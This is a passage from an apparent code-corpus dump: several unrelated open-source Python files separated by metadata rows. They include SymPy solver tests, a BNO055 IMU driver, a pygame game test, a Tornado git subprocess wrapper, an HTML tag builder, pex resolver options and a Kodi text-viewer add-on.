3*sqrt(111)*I)**(S(1)/3))/Mul(6, (1 +
sqrt(3)*I), (251 + 3*sqrt(111)*I)**(S(1)/3),
evaluate=False),)])
def test_issue_2015_3512():
# See that it doesn't hang; this solves in about 2 seconds.
# Also check that the solution is relatively small.
# Note: the system in issue 3512 solves in about 5 seconds and has
# an op-count of 138336 (with simplify=False).
b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r = symbols('b:r')
eqs = Matrix([
[b - c/d + r/d], [c*(1/g + 1/e + 1/d) - f/g - r/d],
[-c/g + f*(1/j + 1/i + 1/g) - h/i], [-f/i + h*(1/m + 1/l + 1/i) - k/m],
[-h/m + k*(1/p + 1/o + 1/m) - n/p], [-k/p + n*(1/q + 1/p)]])
v = Matrix([f, h, k, n, b, c])
ans = solve(list(eqs) , list(v), simplify=False)
# If time is taken to simplify then then 2617 below becomes
# 1168 and the time is about 50 seconds instead of 2.
assert sum([s.count_ops() for s in ans.values()]) <= 2617
def test_det_quick():
m = Matrix(3, 3, symbols('a:9'))
assert m.det() == det_quick(m) # calls det_perm
m[0, 0] = 1
assert m.det() == det_quick(m) # calls det_minor
m = Matrix(3, 3, list(range(9)))
assert m.det() == det_quick(m) # defaults to .det()
# make sure they work with Sparse
s = SparseMatrix(2, 2, (1, 2, 1, 4))
assert det_perm(s) == det_minor(s) == s.det()
|
gpl-3.0
| -7,980,767,662,230,217,000
| 37.597232
| 94
| 0.481523
| false
| 2.423859
| true
| false
| false
|
treehopper-electronics/treehopper-sdk
|
Python/treehopper/libraries/sensors/inertial/bno055.py
|
1
|
4767
|
from time import sleep
from typing import List
from treehopper.api import I2C
from treehopper.libraries import SMBusDevice
from treehopper.libraries.sensors.inertial.bno055_registers import Bno055Registers, OperatingModes, PowerModes
from treehopper.libraries.sensors.inertial import Accelerometer, Gyroscope
from treehopper.libraries.sensors.magnetic.magnetometer import Magnetometer
from treehopper.libraries.sensors.temperature import TemperatureSensor
class Bno055(Accelerometer, Gyroscope, Magnetometer, TemperatureSensor):
"""Bosch BNO055 9-axis IMU with absolute orientation output"""
@staticmethod
def probe(i2c: I2C, rate=100) -> List['Bno055']:
devs = [] # type: List['Bno055']
try:
dev = SMBusDevice(0x28, i2c, rate)
who_am_i = dev.read_byte_data(0x00)
if who_am_i == 0xa0:
devs.append(Bno055(i2c, False, rate))
except RuntimeError:
pass
try:
dev = SMBusDevice(0x29, i2c, rate)
who_am_i = dev.read_byte_data(0x00)
if who_am_i == 0xa0:
devs.append(Bno055(i2c, False, rate))
except RuntimeError:
pass
return devs
def __init__(self, i2c: I2C, alt_address=False, rate=100):
super().__init__()
self._linear_acceleration = [0, 0, 0]
self._quaternion = [0, 0, 0, 0]
self._gravity = [0, 0, 0]
self._eular_angles = [0, 0, 0]
if alt_address:
dev = SMBusDevice(0x29, i2c, rate)
else:
dev = SMBusDevice(0x28, i2c, rate)
self._registers = Bno055Registers(dev)
self._registers.operatingMode.operatingMode = OperatingModes.ConfigMode
self._registers.operatingMode.write()
self._registers.sysTrigger.resetSys = 1
self._registers.sysTrigger.write()
self._registers.sysTrigger.resetSys = 0
dev_id = 0
while dev_id != 0xA0:
try:
self._registers.chipId.read()
dev_id = self._registers.chipId.value
except RuntimeError:
pass
sleep(0.05)
self._registers.powerMode.powerMode = PowerModes.Normal
self._registers.powerMode.write()
sleep(0.01)
self._registers.sysTrigger.selfTest = 0
self._registers.sysTrigger.write()
sleep(0.01)
self._registers.operatingMode.operatingMode = OperatingModes.NineDegreesOfFreedom
self._registers.operatingMode.write()
sleep(0.02)
@property
def linear_acceleration(self):
if self.auto_update_when_property_read:
self.update()
return self._linear_acceleration
@property
def gravity(self):
if self.auto_update_when_property_read:
self.update()
return self._gravity
@property
def eular_angles(self):
if self.auto_update_when_property_read:
self.update()
return self._eular_angles
@property
def quaternion(self):
if self.auto_update_when_property_read:
self.update()
return self._quaternion
def update(self):
self._registers.readRange(self._registers.accelX, self._registers.temp)
self._accelerometer = [self._registers.accelX.value / 16,
self._registers.accelY.value / 16,
self._registers.accelZ.value / 16]
self._magnetometer = [self._registers.magnetometerX.value / 16,
self._registers.magnetometerY.value / 16,
self._registers.magnetometerZ.value / 16]
self._gyroscope = [self._registers.gyroX.value / 16,
self._registers.gyroY.value / 16,
self._registers.gyroZ.value / 16]
self._linear_acceleration = [self._registers.linX.value / 100,
self._registers.linY.value / 100,
self._registers.linZ.value / 100]
self._gravity = [self._registers.gravX.value / 100,
self._registers.gravY.value / 100,
self._registers.gravZ.value / 100]
self._eular_angles = [self._registers.eulPitch.value / 100,
self._registers.eulRoll.value / 100,
self._registers.eulHeading.value / 100]
self._quaternion = [self._registers.quaW.value / 16384,
self._registers.quaX.value / 16384,
self._registers.quaY.value / 16384,
self._registers.quaZ.value / 16384]
self._celsius = self._registers.temp.value
|
mit
| 2,991,752,316,976,240,000
| 34.849624
| 110
| 0.578561
| false
| 3.786338
| false
| false
| false
|
placher/pokeproject2
|
devfiles/testprojectileimpact.py
|
1
|
3561
|
import sys
import pygame
import os
import inspect
from pygame.locals import *
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0,parentdir)
from scripts import player
from scripts import background
from scripts import projectile
class GameSpace:
''' Game Space Controller '''
def main(self):
''' ---------- Initialize Game Space ---------- '''
# initialize pygame enviroment
pygame.init()
# size of the screen
self.size = self.width, self.height = 960, 720
# define base color
self.gray = 128, 128, 128
# initialize display
self.screen = pygame.display.set_mode(self.size)
# initialize sprite movement speed
self.moveSpeed = 1
''' ---------- Initialize Game Objects ---------- '''
# background image
self.background = background.Background()
# player character
self.player = player.Player(1, self.size, self.moveSpeed)
# player 2 character
self.enemy = player.Player(2, self.size, self.moveSpeed)
self.enemy.rect = self.enemy.rect.move((300, 300))
self.enemy.lastDirection = "Up"
# player projectiles
self.projectiles = []
for i in range(8):
self.projectiles.append(projectile.Projectile(1, self.size, 2*self.moveSpeed))
# next projectile
self.nextProjectile = 0
# game clock
self.clock = pygame.time.Clock()
# sprite groups
self.playerSprites = pygame.sprite.RenderPlain((self.player))
self.enemySprites = pygame.sprite.RenderPlain((self.enemy))
self.playerProjectiles = pygame.sprite.RenderPlain((self.projectiles[0]), (self.projectiles[1]), (self.projectiles[2]), (self.projectiles[3]), (self.projectiles[4]), (self.projectiles[5]), (self.projectiles[6]), (self.projectiles[7]))
''' ---------- Initiate Game Loop ---------- '''
# continue loop until game over
cont = True
while (cont):
''' ---------- Tick Speed Regulation ---------- '''
# update only 60 times per second
self.clock.tick(60)
''' ---------- Read User Inputs ---------- '''
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
elif event.type == KEYDOWN and event.key == K_SPACE:
# player attack animation
self.player.attack()
# fire next projectile
self.projectiles[self.nextProjectile].fire(self.player.rect.center, self.player.lastDirection)
# increment projectile counter
self.nextProjectile += 1
if self.nextProjectile == len(self.projectiles):
self.nextProjectile = 0
elif event.type == KEYDOWN:
self.player.keyPressed(event)
elif event.type == KEYUP:
self.player.keyReleased(event)
''' ---------- Call Tick (update) on Game Objects ---------- '''
# update sprites
self.playerSprites.update()
self.playerProjectiles.update()
self.enemySprites.update()
# check for collisions
for impact in pygame.sprite.groupcollide(self.playerProjectiles, self.enemySprites, False, False).keys():
impact.hitSomething()
if (self.enemy.hit() == 0):
# enemy defeated
print("\nYou Win!!\n")
cont = False
''' ---------- Update Screen ---------- '''
# clear screen
self.screen.fill(self.gray)
# draw background
self.screen.blit(self.background.image, self.background.rect)
# render all game objects
self.playerSprites.draw(self.screen)
self.playerProjectiles.draw(self.screen)
self.enemySprites.draw(self.screen)
# flip renderer
pygame.display.flip()
if __name__ == '__main__':
gs = GameSpace()
gs.main()
|
gpl-3.0
| -4,463,376,372,307,577,300
| 29.965217
| 236
| 0.660769
| false
| 3.306407
| false
| false
| false
|
mensi/gittornado
|
gittornado/iowrapper.py
|
1
|
16438
|
# -*- coding: utf-8 -*-
#
# Copyright 2011 Manuel Stocker <mensi@mensi.ch>
#
# This file is part of GitTornado.
#
# GitTornado is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GitTornado is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GitTornado. If not, see http://www.gnu.org/licenses
import subprocess
import zlib
import os
import os.path
import tornado.ioloop
from gittornado.util import get_date_header
import logging
logger = logging.getLogger(__name__)
class FileWrapper(object):
"""Wraps a file and communicates with HTTP client"""
def __init__(self, request, filename, headers={}):
self.request = request
self.headers = headers.copy()
try:
self.file = open(filename, 'rb')
filesize = os.path.getsize(filename)
except:
raise tornado.web.HTTPError(500, 'Unable to open file')
self.headers.update({'Date': get_date_header(), 'Content-Length': str(filesize)})
self.request.write('HTTP/1.1 200 OK\r\n' + '\r\n'.join([ k + ': ' + v for k, v in self.headers.items()]) + '\r\n\r\n')
self.write_chunk()
def write_chunk(self):
data = self.file.read(8192)
if data == '':
# EOF
self.file.close()
self.request.finish()
return
# write data to client and continue when data has been written
self.request.write(data, self.write_chunk)
class ProcessWrapper(object):
"""Wraps a subprocess and communicates with HTTP client
Supports gzip compression and chunked transfer encoding
"""
reading_chunks = False
got_chunk = False
headers_sent = False
got_request = False
sent_chunks = False
number_of_8k_chunks_sent = 0
gzip_decompressor = None
gzip_header_seen = False
process_input_buffer = ''
output_prelude = ''
def __init__(self, request, command, headers, output_prelude=''):
"""Wrap a subprocess
:param request: tornado request object
:param command: command to be given to subprocess.Popen
:param headers: headers to be included on success
:param output_prelude: data to send before the output of the process
"""
self.request = request
self.headers = headers
self.output_prelude = output_prelude
# invoke process
self.process = subprocess.Popen(command, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# check return status
if self.process.poll() is not None:
raise tornado.web.HTTPError(500, 'subprocess returned prematurely')
# get fds
self.fd_stdout = self.process.stdout.fileno()
self.fd_stderr = self.process.stderr.fileno()
self.fd_stdin = self.process.stdin.fileno()
# register with ioloop
self.ioloop = tornado.ioloop.IOLoop.instance()
self.ioloop.add_handler(self.fd_stdout, self._handle_stdout_event, self.ioloop.READ | self.ioloop.ERROR)
self.ioloop.add_handler(self.fd_stderr, self._handle_stderr_event, self.ioloop.READ | self.ioloop.ERROR)
self.ioloop.add_handler(self.fd_stdin, self._handle_stdin_event, self.ioloop.WRITE | self.ioloop.ERROR)
# is it gzipped? If yes, we initialize a zlib decompressobj
if 'gzip' in request.headers.get('Content-Encoding', '').lower(): # HTTP/1.1 RFC says value is case-insensitive
logger.debug("Gzipped request. Initializing decompressor.")
self.gzip_decompressor = zlib.decompressobj(16 + zlib.MAX_WBITS) # skip the gzip header
if self.request.method == 'POST':
# Handle chunked encoding
if request.headers.get('Expect', None) == '100-continue' and request.headers.get('Transfer-Encoding', None) == 'chunked':
logger.debug('Request uses chunked transfer encoding. Sending 100 Continue.')
self.httpstream = self.request.connection.stream
self.request.write("HTTP/1.1 100 (Continue)\r\n\r\n")
self.read_chunks()
else:
logger.debug('Got complete request')
if self.gzip_decompressor:
assert request.body[:2] == '\x1f\x8b', "gzip header"
self.process_input_buffer = self.gzip_decompressor.decompress(request.body)
else:
self.process_input_buffer = request.body
self.got_request = True
else:
logger.debug("Method %s has no input", self.request.method)
self.got_request = True
def read_chunks(self):
"""Read chunks from the HTTP client"""
if self.reading_chunks and self.got_chunk:
# we got on the fast-path and directly read from the buffer.
# if we continue to recurse, this is going to blow up the stack.
# so instead return
#
# NOTE: This actually is unnecessary as long as tornado guarantees that
# ioloop.add_callback always gets dispatched via the main io loop
# and they don't introduce a fast-path similar to read_XY
logger.debug("Fast-Path detected, returning...")
return
while not self.got_request:
self.reading_chunks = True
self.got_chunk = False
# chunk starts with length, so read it. This will then subsequently also read the chunk
self.httpstream.read_until("\r\n", self._chunk_length)
self.reading_chunks = False
if self.got_chunk:
# the previous read hit the fast path and read from the buffer
# instead of going through the main polling loop. This means we
# should iteratively issue the next request
logger.debug("Fast-Path detected, iterating...")
continue
else:
break
# if we arrive here, we read the complete request or
# the ioloop has scheduled another call to read_chunks
return
def _chunk_length(self, data):
"""Received the chunk length"""
assert data[-2:] == "\r\n", "CRLF"
length = data[:-2].split(';')[0] # cut off optional length paramters
length = int(length.strip(), 16) # length is in hex
if length:
logger.debug('Got chunk length: %d', length)
self.httpstream.read_bytes(length + 2, self._chunk_data)
else:
logger.debug('Got last chunk (size 0)')
self.got_request = True
# enable input write event so the handler can finish things up
# when it has written all pending data
self.ioloop.update_handler(self.fd_stdin, self.ioloop.WRITE | self.ioloop.ERROR)
def _chunk_data(self, data):
"""Received chunk data"""
assert data[-2:] == "\r\n", "CRLF"
if self.gzip_decompressor:
if not self.gzip_header_seen:
assert data[:2] == '\x1f\x8b', "gzip header"
self.gzip_header_seen = True
self.process_input_buffer += self.gzip_decompressor.decompress(data[:-2])
else:
self.process_input_buffer += data[:-2]
self.got_chunk = True
if self.process_input_buffer:
# since we now have data in the buffer, enable write events again
logger.debug('Got data in buffer, interested in writing to process again')
self.ioloop.update_handler(self.fd_stdin, self.ioloop.WRITE | self.ioloop.ERROR)
# do NOT call read_chunks directly. This is to give git a chance to consume input.
# we don't want to grow the buffer unnecessarily.
# Additionally, this should mitigate the stack explosion mentioned in read_chunks
self.ioloop.add_callback(self.read_chunks)
def _handle_stdin_event(self, fd, events):
"""Eventhandler for stdin"""
assert fd == self.fd_stdin
if events & self.ioloop.ERROR:
# An error at the end is expected since tornado maps HUP to ERROR
logger.debug('Error on stdin')
# ensure pipe is closed
if not self.process.stdin.closed:
self.process.stdin.close()
# remove handler
self.ioloop.remove_handler(self.fd_stdin)
# if all fds are closed, we can finish
return self._graceful_finish()
# got data ready
logger.debug('stdin ready for write')
if self.process_input_buffer:
count = os.write(fd, self.process_input_buffer)
logger.debug('Wrote first %d bytes of %d total', count, len(self.process_input_buffer))
self.process_input_buffer = self.process_input_buffer[count:]
if not self.process_input_buffer:
# consumed everything in the buffer
if self.got_request:
# we got the request and wrote everything to the process
# this means we can close stdin and stop handling events
# for it
logger.debug('Got complete request, closing stdin')
self.process.stdin.close()
self.ioloop.remove_handler(fd)
else:
# There is more data bound to come from the client
# so just disable write events for the moment until
# we got more to write
logger.debug('Not interested in write events on stdin anymore')
self.ioloop.update_handler(fd, self.ioloop.ERROR)
def _handle_stdout_event(self, fd, events):
"""Eventhandler for stdout"""
assert fd == self.fd_stdout
if events & self.ioloop.READ:
# got data ready to read
data = ''
# Now basically we have two cases: either the client supports
# HTTP/1.1 in which case we can stream the answer in chunked mode
# in HTTP/1.0 we need to send a content-length and thus buffer the complete output
if self.request.supports_http_1_1():
if not self.headers_sent:
self.sent_chunks = True
self.headers.update({'Date': get_date_header(), 'Transfer-Encoding': 'chunked'})
data = 'HTTP/1.1 200 OK\r\n' + '\r\n'.join([ k + ': ' + v for k, v in self.headers.items()]) + '\r\n\r\n'
if self.output_prelude:
data += hex(len(self.output_prelude))[2:] + "\r\n" # cut off 0x
data += self.output_prelude + "\r\n"
self.headers_sent = True
payload = os.read(fd, 8192)
if events & self.ioloop.ERROR: # there might be data remaining in the buffer if we got HUP, get it all
remainder = True
while remainder != '': # until EOF
remainder = os.read(fd, 8192)
payload += remainder
data += hex(len(payload))[2:] + "\r\n" # cut off 0x
data += payload + "\r\n"
else:
if not self.headers_sent:
# Use the over-eager blocking read that will get everything until we hit EOF
# this might actually be somewhat dangerous as noted in the subprocess documentation
# and lead to a deadlock. This is only a legacy mode for HTTP/1.0 clients anyway,
# so we might want to remove it entirely anyways
payload = self.process.stdout.read()
self.headers.update({'Date': get_date_header(), 'Content-Length': str(len(payload))})
data = 'HTTP/1.0 200 OK\r\n' + '\r\n'.join([ k + ': ' + v for k, v in self.headers.items()]) + '\r\n\r\n'
self.headers_sent = True
data += self.output_prelude + payload
else:
# this is actually somewhat illegal as it messes with content-length but
# it shouldn't happen anyways, as the read above should have read anything
# python docs say this can happen on ttys...
logger.error("This should not happen")
data = self.process.stdout.read()
if len(data) == 8200:
self.number_of_8k_chunks_sent += 1
else:
if self.number_of_8k_chunks_sent > 0:
logger.debug('Sent %d * 8192 bytes', self.number_of_8k_chunks_sent)
self.number_of_8k_chunks_sent = 0
logger.debug('Sending stdout to client %d bytes: %r', len(data), data[:20])
self.request.write(data)
# now we can also have an error. This is because tornado maps HUP onto error
# therefore, no elif here!
if events & self.ioloop.ERROR:
logger.debug('Error on stdout')
# ensure file is closed
if not self.process.stdout.closed:
self.process.stdout.close()
# remove handler
self.ioloop.remove_handler(self.fd_stdout)
# if all fds are closed, we can finish
return self._graceful_finish()
def _handle_stderr_event(self, fd, events):
"""Eventhandler for stderr"""
assert fd == self.fd_stderr
if events & self.ioloop.READ:
# got data ready
if not self.headers_sent:
payload = self.process.stderr.read()
data = 'HTTP/1.1 500 Internal Server Error\r\nDate: %s\r\nContent-Length: %d\r\n\r\n' % (get_date_header(), len(payload))
self.headers_sent = True
data += payload
else:
# see stdout
logger.error("This should not happen (stderr)")
data = self.process.stderr.read()
logger.debug('Sending stderr to client: %r', data)
self.request.write(data)
if events & self.ioloop.ERROR:
logger.debug('Error on stderr')
# ensure file is closed
if not self.process.stderr.closed:
self.process.stderr.close()
# remove handler
self.ioloop.remove_handler(self.fd_stderr)
# if all fds are closed, we can finish
return self._graceful_finish()
def _graceful_finish(self):
"""Detect if process has closed pipes and we can finish"""
if not self.process.stdout.closed or not self.process.stderr.closed:
return # stdout/stderr still open
if not self.process.stdin.closed:
self.process.stdin.close()
if self.number_of_8k_chunks_sent > 0:
logger.debug('Sent %d * 8k chunks', self.number_of_8k_chunks_sent)
logger.debug("Finishing up. Process poll: %r", self.process.poll())
if not self.headers_sent:
retval = self.process.poll()
if retval != 0:
logger.warning("Empty response. Git return value: " + str(retval))
payload = "Did not produce any data. Errorcode: " + str(retval)
data = 'HTTP/1.1 500 Internal Server Error\r\nDate: %s\r\nContent-Length: %d\r\n\r\n' % (get_date_header(), len(payload))
self.headers_sent = True
data += payload
self.request.write(data)
else:
data = 'HTTP/1.1 200 Ok\r\nDate: %s\r\nContent-Length: 0\r\n\r\n' % get_date_header()
self.headers_sent = True
self.request.write(data)
# if we are in chunked mode, send end chunk with length 0
elif self.sent_chunks:
logger.debug("End chunk")
self.request.write("0\r\n")
#we could now send some more headers resp. trailers
self.request.write("\r\n")
self.request.finish()
|
gpl-3.0
| 4,464,436,423,476,009,500
| 40.510101
| 137
| 0.582309
| false
| 4.209475
| false
| false
| false
|
markomanninen/tagtor
|
tagtor/main.py
|
1
|
3012
|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
# file: main.py
from copy import deepcopy
class TAG(object):
""" Simple html tag generator """
def __init__(self, *args, **kw):
self._name = self.__class__.__name__.lower()
self._attributes = dict([k.lower(), str(w)] for k, w in kw.iteritems())
self._in = []
self._left = []
self._right = []
map(self.__lshift__, args)
def getName(self):
return self._name
def setName(self, name):
self._name = name
return self
def getAttribute(self, key):
return self._attributes[key] if self._attributes.has_key(key) else None
def setAttribute(self, key, value):
self._attributes[key] = value
return self
def rcontent(self, item):
return self.__rshift__(item)
def __rshift__(self, item):
self._in = [item] + self._in
return self
def content(self, item):
return self.__lshift__(item)
def __lshift__(self, item):
self._in.append(item)
return self
def prepend(self, item):
return self.__radd__(item)
def __radd__(self, item):
self._left.append(item)
return self
def append(self, item):
return self.__add__(item)
def __add__(self, item):
self._right.append(item)
return self
def renderAttributes(self):
attr = ''
if self._attributes:
attr = ''.join([' %s="%s"' % (k, v) for k, v in self._attributes.iteritems()])
return attr
def _repr_html_(self):
return self.__str__()
def __str__(self):
left = ''
right = ''
element = ''
if self._in:
in_elements = ''.join([str(item() if callable(item) else item) for item in self._in])
element = '<%s%s>%s</%s>' % (self._name, self.renderAttributes(), in_elements, self._name)
else:
element = '<%s%s/>' % (self._name, self.renderAttributes())
if self._left:
left = ''.join(map(lambda item: str(item() if callable(item) else item), self._left))
if self._right:
right = ''.join(map(lambda item: str(item() if callable(item) else item), self._right))
return left + element + right
class htmlHelper(object):
""" Tag generation factory """
def __getattr__(self, tag):
""" Only create tag object, if it hasn't been created before. """
if not self.__dict__.has_key(tag):
self.__dict__[tag] = type(tag, (TAG,), {})
# Don't return reference to the object, but "deeply" new object.
return deepcopy(self.__dict__[tag])
"""
All tag elements are accessible via readily constructed factory variable. This helper
should be imported from the module in this wise: ´from tagtor import helper´
OR ´from tagtor import helper as h´ if shorter variable name is preferred
"""
helper = htmlHelper()
|
mit
| -2,851,480,116,332,622,300
| 30.673684
| 102
| 0.548537
| false
| 3.921773
| false
| false
| false
|
sixninetynine/pex
|
pex/resolver_options.py
|
1
|
7285
|
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import print_function
from pkg_resources import safe_name
from .crawler import Crawler
from .fetcher import Fetcher, PyPIFetcher
from .http import Context
from .installer import EggInstaller, WheelInstaller
from .iterator import Iterator
from .package import EggPackage, SourcePackage, WheelPackage
from .sorter import Sorter
from .translator import ChainedTranslator, EggTranslator, SourceTranslator, WheelTranslator
class ResolverOptionsInterface(object):
def get_context(self):
raise NotImplemented
def get_crawler(self):
raise NotImplemented
def get_sorter(self):
raise NotImplemented
def get_translator(self, interpreter, platform):
raise NotImplemented
def get_iterator(self):
raise NotImplemented
class ResolverOptionsBuilder(object):
"""A helper that processes options into a ResolverOptions object.
Used by command-line and requirements.txt processors to configure a resolver.
"""
def __init__(self,
fetchers=None,
allow_all_external=False,
allow_external=None,
allow_unverified=None,
allow_prereleases=None,
precedence=None,
context=None):
self._fetchers = fetchers if fetchers is not None else [PyPIFetcher()]
self._allow_all_external = allow_all_external
self._allow_external = allow_external if allow_external is not None else set()
self._allow_unverified = allow_unverified if allow_unverified is not None else set()
self._allow_prereleases = allow_prereleases
self._precedence = precedence if precedence is not None else Sorter.DEFAULT_PACKAGE_PRECEDENCE
self._context = context or Context.get()
def clone(self):
return ResolverOptionsBuilder(
fetchers=self._fetchers[:],
allow_all_external=self._allow_all_external,
allow_external=self._allow_external.copy(),
allow_unverified=self._allow_unverified.copy(),
allow_prereleases=self._allow_prereleases,
precedence=self._precedence[:],
context=self._context,
)
def add_index(self, index):
fetcher = PyPIFetcher(index)
if fetcher not in self._fetchers:
self._fetchers.append(fetcher)
return self
def set_index(self, index):
self._fetchers = [PyPIFetcher(index)]
return self
def add_repository(self, repo):
fetcher = Fetcher([repo])
if fetcher not in self._fetchers:
self._fetchers.append(fetcher)
return self
def clear_indices(self):
self._fetchers = [fetcher for fetcher in self._fetchers if not isinstance(fetcher, PyPIFetcher)]
return self
def allow_all_external(self):
self._allow_all_external = True
return self
def allow_external(self, key):
self._allow_external.add(safe_name(key).lower())
return self
def allow_unverified(self, key):
self._allow_unverified.add(safe_name(key).lower())
return self
def use_wheel(self):
if WheelPackage not in self._precedence:
self._precedence = (WheelPackage,) + self._precedence
return self
def no_use_wheel(self):
self._precedence = tuple(
[precedent for precedent in self._precedence if precedent is not WheelPackage])
return self
def allow_builds(self):
if SourcePackage not in self._precedence:
self._precedence = self._precedence + (SourcePackage,)
return self
def no_allow_builds(self):
self._precedence = tuple(
[precedent for precedent in self._precedence if precedent is not SourcePackage])
return self
# TODO: Make this whole interface more Pythonic.
#
# This method would be better defined as a property allow_prereleases.
# Unfortunately, the existing method below already usurps the name allow_prereleases.
# It is an existing API that returns self as if it was written in an attempt to allow
# Java style chaining of method calls.
# Due to that return type, it cannot be used as a Python property setter.
# It's currently used in this manner:
#
# builder.allow_prereleases(True)
#
# and we cannot change it into @allow_prereleases.setter and use in this manner:
#
# builder.allow_prereleases = True
#
# without affecting the existing API calls.
#
# The code review shows that, for this particular method (allow_prereleases),
# the return value (self) is never used in the current API calls.
# It would be worth examining if the API change for this and some other methods here
# would be a good idea.
@property
def prereleases_allowed(self):
return self._allow_prereleases
def allow_prereleases(self, allowed):
self._allow_prereleases = allowed
return self
def build(self, key):
return ResolverOptions(
fetchers=self._fetchers,
allow_external=self._allow_all_external or key in self._allow_external,
allow_unverified=key in self._allow_unverified,
allow_prereleases=self._allow_prereleases,
precedence=self._precedence,
context=self._context,
)
class ResolverOptions(ResolverOptionsInterface):
def __init__(self,
fetchers=None,
allow_external=False,
allow_unverified=False,
allow_prereleases=None,
precedence=None,
context=None):
self._fetchers = fetchers if fetchers is not None else [PyPIFetcher()]
self._allow_external = allow_external
self._allow_unverified = allow_unverified
self._allow_prereleases = allow_prereleases
self._precedence = precedence if precedence is not None else Sorter.DEFAULT_PACKAGE_PRECEDENCE
self._context = context or Context.get()
# TODO(wickman) Revisit with Github #58
def get_context(self):
return self._context
def get_crawler(self):
return Crawler(self.get_context())
# get_sorter and get_translator are arguably options that should be global
# except that --no-use-wheel fucks this shit up. hm.
def get_sorter(self):
return Sorter(self._precedence)
def get_translator(self, interpreter, platform):
translators = []
# TODO(wickman) This is not ideal -- consider an explicit link between a Package
# and its Installer type rather than mapping this here, precluding the ability to
# easily add new package types (or we just forego that forever.)
for package in self._precedence:
if package is WheelPackage:
translators.append(WheelTranslator(interpreter=interpreter, platform=platform))
elif package is EggPackage:
translators.append(EggTranslator(interpreter=interpreter, platform=platform))
elif package is SourcePackage:
installer_impl = WheelInstaller if WheelPackage in self._precedence else EggInstaller
translators.append(SourceTranslator(
installer_impl=installer_impl,
interpreter=interpreter,
platform=platform))
return ChainedTranslator(*translators)
def get_iterator(self):
return Iterator(
fetchers=self._fetchers,
crawler=self.get_crawler(),
follow_links=self._allow_external,
allow_prereleases=self._allow_prereleases
)
|
apache-2.0
| 5,057,392,927,551,107,000
| 33.201878
| 100
| 0.699657
| false
| 4.20612
| false
| false
| false
|
XBMC-Addons/service.xbmc.versioncheck
|
resources/lib/version_check/viewer.py
|
1
|
5158
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Copyright (C) 2011-2013 Martijn Kaijser
Copyright (C) 2013-2014 Team-XBMC
Copyright (C) 2014-2019 Team Kodi
This file is part of service.xbmc.versioncheck
SPDX-License-Identifier: GPL-3.0-or-later
See LICENSES/GPL-3.0-or-later.txt for more information.
"""
from contextlib import closing
import os
import sys
import xbmc # pylint: disable=import-error
import xbmcaddon # pylint: disable=import-error
import xbmcgui # pylint: disable=import-error
import xbmcvfs # pylint: disable=import-error
_ADDON = xbmcaddon.Addon('service.xbmc.versioncheck')
_ADDON_NAME = _ADDON.getAddonInfo('name')
if sys.version_info[0] >= 3:
_ADDON_PATH = _ADDON.getAddonInfo('path')
else:
_ADDON_PATH = _ADDON.getAddonInfo('path').decode('utf-8')
_ICON = _ADDON.getAddonInfo('icon')
class Viewer:
""" Show user a text viewer (WINDOW_DIALOG_TEXT_VIEWER)
Include the text file for the viewers body in the resources/ directory
usage:
script_path = os.path.join(_ADDON_PATH, 'resources', 'lib', 'version_check', 'viewer.py')
xbmc.executebuiltin('RunScript(%s,%s,%s)' % (script_path, 'Heading', 'notice.txt'))
:param heading: text viewer heading
:type heading: str
:param filename: filename to use for text viewers body
:type filename: str
"""
WINDOW = 10147
CONTROL_LABEL = 1
CONTROL_TEXTBOX = 5
def __init__(self, heading, filename):
self.heading = heading
self.filename = filename
# activate the text viewer window
xbmc.executebuiltin('ActivateWindow(%d)' % (self.WINDOW,))
# get window
self.window = xbmcgui.Window(self.WINDOW)
# give window time to initialize
xbmc.sleep(100)
# set controls
self.set_controls()
def set_controls(self):
""" Set the window controls
"""
# get text viewer body text
text = self.get_text()
# set heading
self.window.getControl(self.CONTROL_LABEL).setLabel('%s : %s' % (_ADDON_NAME,
self.heading,))
# set text
self.window.getControl(self.CONTROL_TEXTBOX).setText(text)
xbmc.sleep(2000)
def get_text(self):
""" Get the text viewers body text from self.filename
:return: contents of self.filename
:rtype: str
"""
try:
return self.read_file(self.filename)
except Exception as error: # pylint: disable=broad-except
xbmc.log(_ADDON_NAME + ': ' + str(error), xbmc.LOGERROR)
return ''
@staticmethod
def read_file(filename):
""" Read the contents of the provided file, from
os.path.join(_ADDON_PATH, 'resources', filename)
:param filename: name of file to read
:type filename: str
:return: contents of the provided file
:rtype: str
"""
filename = os.path.join(_ADDON_PATH, 'resources', filename)
with closing(xbmcvfs.File(filename)) as open_file:
contents = open_file.read()
return contents
class WebBrowser:
""" Display url using the default browser
usage:
script_path = os.path.join(_ADDON_PATH, 'resources', 'lib', 'version_check', 'viewer.py')
xbmc.executebuiltin('RunScript(%s,%s,%s)' % (script_path, 'webbrowser', 'https://kodi.tv/'))
:param url: url to open
:type url: str
"""
def __init__(self, url):
self.url = url
try:
# notify user
self.notification(_ADDON_NAME, self.url)
xbmc.sleep(100)
# launch url
self.launch_url()
except Exception as error: # pylint: disable=broad-except
xbmc.log(_ADDON_NAME + ': ' + str(error), xbmc.LOGERROR)
@staticmethod
def notification(heading, message, icon=None, time=15000, sound=True):
""" Create a notification
:param heading: notification heading
:type heading: str
:param message: notification message
:type message: str
:param icon: path and filename for the notification icon
:type icon: str
:param time: time to display notification
:type time: int
:param sound: is notification audible
:type sound: bool
"""
if not icon:
icon = _ICON
xbmcgui.Dialog().notification(heading, message, icon, time, sound)
def launch_url(self):
""" Open self.url in the default web browser
"""
import webbrowser # pylint: disable=import-outside-toplevel
webbrowser.open(self.url)
if __name__ == '__main__':
try:
if sys.argv[1] == 'webbrowser':
WebBrowser(sys.argv[2])
else:
Viewer(sys.argv[1], sys.argv[2])
except Exception as err: # pylint: disable=broad-except
xbmc.log(_ADDON_NAME + ': ' + str(err), xbmc.LOGERROR)
